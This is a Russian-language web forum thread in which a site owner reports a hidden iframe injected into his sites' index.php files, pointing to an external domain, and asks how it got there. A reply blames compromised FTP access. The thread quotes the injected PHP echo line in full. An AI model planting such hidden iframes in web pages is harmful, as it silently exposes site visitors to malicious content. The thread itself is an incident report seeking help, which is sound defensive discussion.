Kolbaser 33 Опубликовано: 24 декабря 2009 Рассказать Опубликовано: 24 декабря 2009 Сегодня обнаружил срабатывание касперского на своих сайтах, посмотрил исходный код и в самом низу нашёл этот код: echo '<div style="visibility:hidden"><iframe src="http://burgerclick.in/ar_zzz/index.php" width=100 height=10></iframe></div>'; Мне интересно как его могли вставить. Код я нашёл в index.php, но дело в том, что дата обновления этого файла на сервере стоит очень давняя, а я неделю назад копировал все файлы к себе на комп и тогда всё было чисто, а сейчас все сайты на сервере были с этим ифреймом, а дата обновления index.php могла стоять очень старая. Как можно изменить файл, чтоб дата осталась прежней? Если у человека есть "рут" доступ к серверу, он видит фтп пароли к моим сайтам или нет? (извиняюсь за глупый вопрос, но я не программист). Просто дело в том, что из командера пароли не могли увести, т.к. там пароли и на другой хостинг и, следовательно, ифрэйм был бы и там, но его там нету. Значит пароли украли как-то по другому. Естественно я никому пароли не давал. В прошлом месяце бала такая же фигня и тоже только на этом сервере, я тогда поменял пароль к админке сервера и некоторые фтп пароли на сайты, но сейчас всё повторилось и пофиг, что я что-то там менял Короче я ничего не могу придумать, кроме как если это делает тот человек, который имеет "рут" доступ к серверу, но я не могу от него отказаться, т.к. он мне так настроил нгинкс на сервере, что при любом изменении любых характеристик на сервере (даже смена фтп на каком-либо сайте) ложит сайты и чтоб этого избежать, мне в таких случаях нужно, чтоб он одновременно был в "рут" доступе и вносил там какие-то коррективы... короче не очень удобно... Что вы мне можете посоветовать в таком случае, конечно это могли быть и админы хостинг компании, но я у них почти год арендую сервер и такое началось только месяц назад, а человек этот имеет доступ "рут" где-то с весны и тоже раньше всё было нормально... (этот человек имеет довольно хорошую репутацию на этом форуме) Короче х.з., соврешенно не хочется никого обвинять, но и с такой ерундой возиться надоело... Мой сайт Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 006 Опубликовано: 24 декабря 2009 Рассказать Опубликовано: 24 декабря 2009 Скомпрометирован доступ по FTP, как это происходит и из за чего и что делать, уже неоднократно писалось на форуме, в частности http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.